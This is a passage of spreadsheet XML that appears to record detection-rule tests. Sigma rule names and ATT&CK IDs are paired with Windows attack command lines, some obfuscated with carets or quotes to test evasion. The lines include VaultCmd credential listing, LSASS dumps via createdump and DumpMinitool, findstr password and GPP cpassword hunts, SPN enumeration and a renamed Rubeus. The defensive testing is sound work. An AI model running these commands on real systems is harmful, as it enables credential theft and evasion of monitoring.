      <c r="D515" s="43" t="inlineStr">
        <is>
          <t>58f50261-c53b-4c88-bd12-1d71f12eda4c</t>
        </is>
      </c>
      <c r="E515" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c ""C:\WINDOWS\system32\VaultCmd.exe" /lis^tcreds:"Web Credentials" /all"</t>
        </is>
      </c>
      <c r="F515" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G515" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H515" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I515" s="43" t="n"/>
      <c r="J515" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K515" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="516" ht="15.75" customHeight="1" s="42">
      <c r="A516" s="43" t="n"/>
      <c r="B516" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C516" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D516" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E516" s="43" t="inlineStr">
        <is>
          <t>copy C:\Tools\Rubeus.exe C:\Windows\Temp\not_malware.exe</t>
        </is>
      </c>
      <c r="F516" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G516" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H516" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I516" s="43" t="n"/>
      <c r="J516" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K516" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="517" ht="15.75" customHeight="1" s="42">
      <c r="A517" s="43" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B517" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_setspn_spn_enumeration</t>
        </is>
      </c>
      <c r="C517" s="43" t="inlineStr">
        <is>
          <t>Potential SPN Enumeration Via Setspn.EXE</t>
        </is>
      </c>
      <c r="D517" s="43" t="inlineStr">
        <is>
          <t>1eeed653-dbc8-4187-ad0c-eeebb20e6599</t>
        </is>
      </c>
      <c r="E517" s="43" t="inlineStr">
        <is>
          <t>setspn.exe -T %USERDNSDOMAIN% -Q */*</t>
        </is>
      </c>
      <c r="F517" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G517" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H517" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I517" s="43" t="inlineStr">
        <is>
          <t>Potential SPN Enumeration Via Setspn.EXE (1eeed653-dbc8-4187-ad0c-eeebb20e6599)</t>
        </is>
      </c>
      <c r="J517" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K517" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="518" ht="15.75" customHeight="1" s="42">
      <c r="A518" s="43" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B518" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_setspn_spn_enumeration</t>
        </is>
      </c>
      <c r="C518" s="43" t="inlineStr">
        <is>
          <t>Potential SPN Enumeration Via Setspn.EXE</t>
        </is>
      </c>
      <c r="D518" s="43" t="inlineStr">
        <is>
          <t>1eeed653-dbc8-4187-ad0c-eeebb20e6599</t>
        </is>
      </c>
      <c r="E518" s="43" t="inlineStr">
        <is>
          <t>setspn.exe -T %USERDNSDOMAIN% "-q" */*</t>
        </is>
      </c>
      <c r="F518" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G518" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H518" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I518" s="43" t="n"/>
      <c r="J518" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K518" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="519" ht="15.75" customHeight="1" s="42">
      <c r="A519" s="43" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B519" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_setspn_spn_enumeration</t>
        </is>
      </c>
      <c r="C519" s="43" t="inlineStr">
        <is>
          <t>Potential SPN Enumeration Via Setspn.EXE</t>
        </is>
      </c>
      <c r="D519" s="43" t="inlineStr">
        <is>
          <t>1eeed653-dbc8-4187-ad0c-eeebb20e6599</t>
        </is>
      </c>
      <c r="E519" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c setspn.exe -T %USERDNSDOMAIN% -^q */*</t>
        </is>
      </c>
      <c r="F519" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G519" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H519" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I519" s="43" t="inlineStr">
        <is>
          <t>Potential SPN Enumeration Via Setspn.EXE (1eeed653-dbc8-4187-ad0c-eeebb20e6599)</t>
        </is>
      </c>
      <c r="J519" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K519" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="520" ht="15.75" customHeight="1" s="42">
      <c r="A520" s="43" t="n"/>
      <c r="B520" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C520" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D520" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E520" s="43" t="inlineStr">
        <is>
          <t>findstr.exe -si "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F520" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G520" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H520" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I520" s="43" t="n"/>
      <c r="J520" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K520" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="521" ht="15.75" customHeight="1" s="42">
      <c r="A521" s="43" t="n"/>
      <c r="B521" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_new_network_provider</t>
        </is>
      </c>
      <c r="C521" s="44" t="inlineStr">
        <is>
          <t>Potential Credential Dumping Attempt Using New NetworkProvider - CLI</t>
        </is>
      </c>
      <c r="D521" s="44" t="inlineStr">
        <is>
          <t>baef1ec6-2ca9-47a3-97cc-4cf2bda10b77</t>
        </is>
      </c>
      <c r="E521" s="43" t="n"/>
      <c r="F521" s="43" t="n"/>
      <c r="G521" s="43" t="n"/>
      <c r="H521" s="43" t="n"/>
      <c r="I521" s="43" t="n"/>
      <c r="J521" s="43" t="n"/>
      <c r="K521" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="522" ht="15.75" customHeight="1" s="42">
      <c r="A522" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B522" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C522" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D522" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E522" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" ^| findstr /m .</t>
        </is>
      </c>
      <c r="F522" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G522" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H522" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I522" s="43" t="n"/>
      <c r="J522" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K522" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="523" ht="15.75" customHeight="1" s="42">
      <c r="A523" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B523" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C523" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D523" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E523" s="43" t="inlineStr">
        <is>
          <t>findstr /s/i "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F523" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G523" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H523" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I523" s="43" t="n"/>
      <c r="J523" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K523" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="524" ht="15.75" customHeight="1" s="42">
      <c r="A524" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B524" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C524" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D524" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E524" s="43" t="inlineStr">
        <is>
          <t>findstr -s -i "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F524" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G524" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H524" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I524" s="43" t="n"/>
      <c r="J524" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K524" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="525" ht="15.75" customHeight="1" s="42">
      <c r="A525" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B525" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C525" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D525" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E525" s="43" t="inlineStr">
        <is>
          <t>findstr -si "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F525" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G525" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H525" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I525" s="43" t="n"/>
      <c r="J525" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K525" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="526" ht="15.75" customHeight="1" s="42">
      <c r="A526" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B526" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C526" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D526" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E526" s="43" t="inlineStr">
        <is>
          <t>findstr /S /I "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F526" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G526" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H526" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I526" s="43" t="n"/>
      <c r="J526" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K526" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="527" ht="15.75" customHeight="1" s="42">
      <c r="A527" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B527" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C527" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D527" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E527" s="43" t="inlineStr">
        <is>
          <t>findstr.exe /s /i "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F527" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G527" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H527" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I527" s="43" t="n"/>
      <c r="J527" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K527" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="528" ht="15.75" customHeight="1" s="42">
      <c r="A528" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B528" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C528" s="43" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D528" s="43" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E528" s="43" t="inlineStr">
        <is>
          <t>"C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\5.0.17\\createdump.exe" --full -f C:\\Users\\thaim\\AppData\\Local\\Temp\\dotnet-lsass.dmp 788</t>
        </is>
      </c>
      <c r="F528" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G528" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H528" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I528" s="43" t="n"/>
      <c r="J528" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K528" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="529" ht="15.75" customHeight="1" s="42">
      <c r="A529" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B529" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C529" s="43" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D529" s="43" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E529" s="43" t="inlineStr">
        <is>
          <t>"C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\5.0.17\\createdump.exe" --full --name C:\\Users\\thaim\\AppData\\Local\\Temp\\dotnet-lsass.dmp 788</t>
        </is>
      </c>
      <c r="F529" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G529" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H529" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I529" s="43" t="n"/>
      <c r="J529" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K529" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="530" ht="15.75" customHeight="1" s="42">
      <c r="A530" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B530" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_execution</t>
        </is>
      </c>
      <c r="C530" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D530" s="43" t="inlineStr">
        <is>
          <t>dee0a7a3-f200-4112-a99b-952196d81e42</t>
        </is>
      </c>
      <c r="E530" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool.exe 712 C:\temp\dump.dmp F"ull</t>
        </is>
      </c>
      <c r="F530" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G530" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H530" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I530" s="43" t="n"/>
      <c r="J530" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K530" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="531" ht="15.75" customHeight="1" s="42">
      <c r="A531" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B531" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_execution</t>
        </is>
      </c>
      <c r="C531" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D531" s="43" t="inlineStr">
        <is>
          <t>dee0a7a3-f200-4112-a99b-952196d81e42</t>
        </is>
      </c>
      <c r="E531" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool.exe 712 C:\temp\dump.dmp Full</t>
        </is>
      </c>
      <c r="F531" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G531" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H531" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I531" s="43" t="n"/>
      <c r="J531" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K531" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="532" ht="15.75" customHeight="1" s="42">
      <c r="A532" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B532" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C532" s="43" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D532" s="43" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E532" s="43" t="inlineStr">
        <is>
          <t>TrolleyExpress.exe 999</t>
        </is>
      </c>
      <c r="F532" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G532" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H532" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I532" s="43" t="n"/>
      <c r="J532" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K532" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="533" ht="15.75" customHeight="1" s="42">
      <c r="A533" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B533" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C533" s="43" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D533" s="43" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E533" s="43" t="inlineStr">
        <is>
          <t>TrolleyExpress.exe `755`</t>
        </is>
      </c>
      <c r="F533" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G533" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H533" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I533" s="43" t="n"/>
      <c r="J533" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K533" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="534" ht="15.75" customHeight="1" s="42">
      <c r="A534" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B534" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_gpp_passwords</t>
        </is>
      </c>
      <c r="C534" s="43" t="inlineStr">
        <is>
          <t>Findstr GPP Passwords</t>
        </is>
      </c>
      <c r="D534" s="43" t="inlineStr">
        <is>
          <t>91a2c315-9ee6-4052-a853-6f6a8238f90d</t>
        </is>
      </c>
      <c r="E534" s="43" t="inlineStr">
        <is>
          <t>findstr /S cpassword "\\THAIMX\sysvol\*.xml"</t>
        </is>
      </c>
      <c r="F534" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G534" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H534" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I534" s="43" t="n"/>
      <c r="J534" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K534" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="535" ht="15.75" customHeight="1" s="42">
      <c r="A535" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B535" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_gpp_passwords</t>
        </is>
      </c>
      <c r="C535" s="43" t="inlineStr">
        <is>
          <t>Findstr GPP Passwords</t>
        </is>
      </c>
      <c r="D535" s="43" t="inlineStr">
        <is>
          <t>91a2c315-9ee6-4052-a853-6f6a8238f90d</t>
        </is>
      </c>
      <c r="E535" s="43" t="inlineStr">
        <is>
          <t>findstr /S cpassword \\THAIMX\sysvol\*.xml \""</t>
        </is>
      </c>
      <c r="F535" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G535" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H535" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I535" s="43" t="n"/>
      <c r="J535" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K535" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="536" ht="15.75" customHeight="1" s="42">
      <c r="A536" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B536" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_gpp_passwords</t>
        </is>
      </c>
      <c r="C536" s="43" t="inlineStr">
        <is>
          <t>Findstr GPP Passwords</t>
        </is>
      </c>
      <c r="D536" s="43" t="inlineStr">
        <is>
          <t>91a2c315-9ee6-4052-a853-6f6a8238f90d</t>
        </is>
      </c>
      <c r="E536" s="43" t="inlineStr">
        <is>
          <t>findstr /S cpassword \\THAIMX\sysvol\*.xml</t>
        </is>
      </c>
      <c r="F536" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G536" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H536" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I536" s="43" t="n"/>
      <c r="J536" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K536" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="537" ht="15.75" customHeight="1" s="42">
      <c r="A537" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B537" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_lsass</t>
        </is>
      </c>
      <c r="C537" s="43" t="inlineStr">
        <is>
          <t>LSASS Process Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D537" s="43" t="inlineStr">
        <is>
          <t>fe63010f-8823-4864-a96b-a7b4a0f7b929</t>
        </is>
      </c>
      <c r="E537" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c tasklist | findstr lsass</t>
        </is>
      </c>
      <c r="F537" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G537" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H537" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I537" s="43" t="n"/>
      <c r="J537" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K537" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="538" ht="15.75" customHeight="1" s="42">
      <c r="A538" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B538" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_lsass</t>
        </is>
      </c>
      <c r="C538" s="43" t="inlineStr">
        <is>
          <t>LSASS Process Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D538" s="43" t="inlineStr">
        <is>
          <t>fe63010f-8823-4864-a96b-a7b4a0f7b929</t>
        </is>
      </c>
      <c r="E538" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c tasklist | findstr /i "lsass"</t>
        </is>
      </c>
      <c r="F538" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G538" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H538" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I538" s="43" t="n"/>
      <c r="J538" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K538" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="539" ht="15.75" customHeight="1" s="42">
      <c r="A539" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B539" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_lsass</t>
        </is>
      </c>
      <c r="C539" s="43" t="inlineStr">
        <is>
          <t>LSASS Process Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D539" s="43" t="inlineStr">
        <is>
          <t>fe63010f-8823-4864-a96b-a7b4a0f7b929</t>
        </is>
      </c>
      <c r="E539" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c tasklist | findstr /R "ls[a]ss"</t>
        </is>
      </c>
      <c r="F539" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G539" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H539" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I539" s="43" t="n"/>
      <c r="J539" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K539" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="540" ht="15.75" customHeight="1" s="42">
      <c r="A540" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B540" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_everyone</t>
        </is>
      </c>
      <c r="C540" s="43" t="inlineStr">
        <is>
          <t>Permission Misconfiguration Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D540" s="43" t="inlineStr">
        <is>
          <t>47e4bab7-c626-47dc-967b-255608c9a920</t>
        </is>
      </c>
      <c r="E540" s="43" t="inlineStr">
        <is>
          <t>icacls "C:\\Program Files\*" 2&gt;nul | findstr /c:"Everyone"</t>
        </is>
      </c>
      <c r="F540" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G540" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H540" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I540" s="43" t="n"/>
      <c r="J540" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K540" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="541" ht="15.75" customHeight="1" s="42">
      <c r="A541" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B541" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_everyone</t>
        </is>
      </c>
      <c r="C541" s="43" t="inlineStr">
        <is>
          <t>Permission Misconfiguration Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D541" s="43" t="inlineStr">
        <is>
          <t>47e4bab7-c626-47dc-967b-255608c9a920</t>
        </is>
      </c>
      <c r="E541" s="43" t="inlineStr">
        <is>
          <t>icacls "C:\\Program Files\*" 2&gt;nul | findstr "EVERYONE"</t>
        </is>
      </c>
      <c r="F541" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G541" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H541" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I541" s="43" t="n"/>
      <c r="J541" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K541" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="542" ht="15.75" customHeight="1" s="42">
      <c r="A542" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B542" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_everyone</t>
        </is>
      </c>
      <c r="C542" s="43" t="inlineStr">
        <is>
          <t>Permission Misconfiguration Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D542" s="43" t="inlineStr">
        <is>
          <t>47e4bab7-c626-47dc-967b-255608c9a920</t>
        </is>
      </c>
      <c r="E542" s="43" t="inlineStr">
        <is>
          <t>icacls "C:\\Program Files\*" 2&gt;nul | findstr "Everyone" | findstr "(M)"</t>
        </is>
      </c>
      <c r="F542" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G542" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H542" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I542" s="43" t="n"/>
      <c r="J542" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K542" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="543" ht="15.75" customHeight="1" s="42">
      <c r="A543" s="43" t="inlineStr">
        <is>
          <t>t1040</t>
        </is>
      </c>
      <c r="B543" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_packet_capture</t>
        </is>
      </c>
      <c r="C543" s="43" t="inlineStr">
        <is>
          <t>New Network Trace Capture Started Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D543" s="43" t="inlineStr">
        <is>
          <t>d3c3861d-c504-4c77-ba55-224ba82d0118</t>
        </is>
      </c>
      <c r="E543" s="43" t="inlineStr">
        <is>
          <t>netsh tr st capture=yes</t>
        </is>
      </c>
      <c r="F543" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G543" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H543" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I543" s="43" t="n"/>
      <c r="J543" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K543" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="544" ht="15.75" customHeight="1" s="42">
      <c r="A544" s="43" t="inlineStr">
        <is>
          <t>t1040</t>
        </is>
      </c>
